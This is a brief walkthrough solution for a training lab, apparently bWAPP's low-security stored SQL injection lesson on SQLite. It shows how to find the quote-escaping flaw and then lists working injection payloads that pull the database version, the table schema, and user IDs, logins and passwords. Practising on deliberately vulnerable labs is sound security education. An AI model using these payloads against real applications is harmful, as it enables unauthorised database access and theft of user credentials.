SQL Injection Stored SQLite Low Security Level
SQL Injection - Stored (SQLite) - Low Security Level
Solution:
Step 1. Enter ' and click on Add entry Check the output - The entry was added to our blog!
Note: No changes are displayed any where in the page
Lets test the lesson with '' as an entry and check the results - Now the entries are displayed. Check the output. Instead of '' only ' is displayed.
Step 2. Use the below payloads to test the lesson - Click on Add Entry once the payloads are given as an input.
Note: You can modify the prefix of the payload to any name or keep it blank as shown in the video.
Payloads:
PseudoTime',(select sqlite_version())) --
',(select tbl_name from sqlite_master limit 1,1))--
',(select sql from sqlite_master where tbl_name='users'))--
',(select id from users limit 0,1))--
',(select login from users limit 0,1))--
',(select password from users limit 0,1))--
Note when you click on Delete Entries all your entries will be deleted.
Explore the lesson with other payloads.
PseudoTime
